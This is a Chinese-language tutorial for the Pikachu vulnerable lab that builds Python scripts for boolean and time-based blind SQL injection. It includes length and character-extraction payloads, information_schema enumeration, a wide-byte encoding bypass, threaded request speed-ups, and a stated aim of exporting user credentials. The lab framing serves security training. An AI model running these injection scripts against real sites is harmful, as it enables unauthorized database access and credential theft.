Python自动化SQL盲注实战：Pikachu靶场高效渗透指南

当你在Pikachu靶场反复手工尝试SQL盲注时，是否想过用Python解放双手？本文将带你从零构建自动化探测脚本，彻底摆脱低效的手工猜测过程。不同于基础教程的逐个关卡演示，我们将深入剖析布尔盲注和时间盲注的自动化实现原理，提供可直接复用的代码模块。

1. 盲注自动化核心原理

SQL盲注的本质是通过差异响应来推断数据库信息。手工操作需要逐个字符猜测，而自动化脚本通过系统化请求和响应分析实现高效探测。

1.1 布尔盲注的自动化逻辑

布尔盲注依赖页面返回的真假状态判断。自动化实现需要处理三个关键环节：

1. 状态识别机制：通过特定字符串（如"您的uid"）或HTML元素特征判断查询结果
2. 字符集定义：确定需要遍历的ASCII范围（通常为32-126的可打印字符）
3. 二分查找优化：对长度和字符位置采用二分法减少请求次数

python复制# 布尔盲注状态判断示例
def check_boolean_condition(response):
    return "您的uid" in response.text  # 根据实际靶场返回调整

1.2 时间盲注的自动化逻辑

时间盲注通过响应延迟判断条件真假，自动化实现需注意：

• 超时阈值设置：通常3-5秒，需根据网络状况调整
• 异常处理机制：捕获requests超时异常作为判断依据
• 时间补偿：考虑网络抖动，可引入基准响应时间对比

python复制# 时间盲注检测示例
import requests
from requests.exceptions import Timeout

try:
    response = requests.get(url, params=payload, timeout=2)
    return False  # 未触发延迟
except Timeout:
    return True   # 触发延迟条件

2. 靶场环境准备与脚本框架

2.1 Pikachu靶场配置要点

在本地搭建测试环境时需注意：

2.2 Python脚本基础框架

构建可扩展的盲注自动化工具需要模块化设计：

python复制class BlindSQLi:
    def __init__(self, target_url):
        self.url = target_url
        self.session = requests.Session()
        self.headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
            "Accept": "text/html,application/xhtml+xml"
        }
        
    def detect_database(self):
        """主探测逻辑"""
        pass
        
    def _boolean_test(self, condition):
        """布尔条件测试"""
        pass
        
    def _timing_test(self, condition):
        """时间条件测试"""
        pass

3. 核心功能实现详解

3.1 数据库名探测模块

采用二分法优化传统线性猜测，将时间复杂度从O(n)降低到O(log n)：

python复制def get_database_length(self, max_guess=30):
    low, high = 1, max_guess
    while low <= high:
        mid = (low + high) // 2
        payload = f"admin' AND LENGTH(database())>{mid}-- "
        if self._test_condition(payload):
            low = mid + 1
        else:
            high = mid - 1
    return low

字符猜解采用逐位ASCII比较，避免引号逃逸问题：

python复制def get_database_name(self, length):
    db_name = ""
    for pos in range(1, length+1):
        for char_code in range(32, 127):
            payload = f"admin' AND ASCII(SUBSTRING(database(),{pos},1))={char_code}-- "
            if self._test_condition(payload):
                db_name += chr(char_code)
                break
    return db_name

3.2 表名与字段提取技术

基于information_schema的通用查询方法：

python复制def get_tables(self, db_name):
    table_count_payload = f"admin' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db_name}')>{0}-- "
    # 先获取表数量，再逐个获取表名
    ...

针对Pikachu的特殊处理技巧：

1. 使用GROUP_CONCAT合并多行结果
2. 对长内容采用SUBSTRING分段获取
3. 十六进制编码处理特殊字符

python复制# 分段获取长数据示例
def get_long_data(self, query_template, chunk_size=30):
    full_data = ""
    for offset in range(0, 1000, chunk_size):
        payload = query_template.format(offset, chunk_size)
        chunk = self._extract_data(payload)
        if not chunk:
            break
        full_data += chunk
    return full_data

4. 高级优化与实战技巧

4.1 性能优化方案

通过并发请求大幅提升效率：

python复制from concurrent.futures import ThreadPoolExecutor

def concurrent_guess(position):
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = {
            executor.submit(self._test_char, position, char): char
            for char in printable_chars
        }
        for future in as_completed(futures):
            if future.result():
                return futures[future]

其他优化手段：

• 请求缓存：避免重复测试已知字符
• 动态字符集：根据已发现字符调整猜测范围
• 延迟自适应：根据响应时间动态调整超时阈值

4.2 靶场实战注意事项

1. 会话维持：处理PHPSESSID等会话标识

   python复制self.session.cookies.update({
       "PHPSESSID": "从浏览器获取的实际值"
   })
   

2. 请求编码：处理宽字节等特殊场景

   python复制payload = f"admin%df' AND 1=1-- ".encode('latin1')
   

3. 错误处理：应对WAF拦截和异常响应

   python复制try:
       response = self.session.post(url, data=data, timeout=3)
       response.raise_for_status()
   except requests.exceptions.RequestException as e:
       print(f"请求失败: {str(e)}")
       return None
   

完整脚本应包含以下功能模块：

1. 数据库信息探测（名称、版本、用户）
2. 表结构提取（表名、字段名）
3. 数据内容导出（用户凭证、敏感信息）
4. 结果报告生成（HTML/TXT格式）

在Pikachu的布尔盲注关卡测试时，发现当查询条件为真时页面会显示用户ID，而条件为假时显示"用户不存在"。这个特征差异正是我们自动化脚本判断的依据。对于时间盲注，设置3秒的延迟阈值能有效区分真假条件，但要注意本地测试环境的性能波动可能影响判断准确性。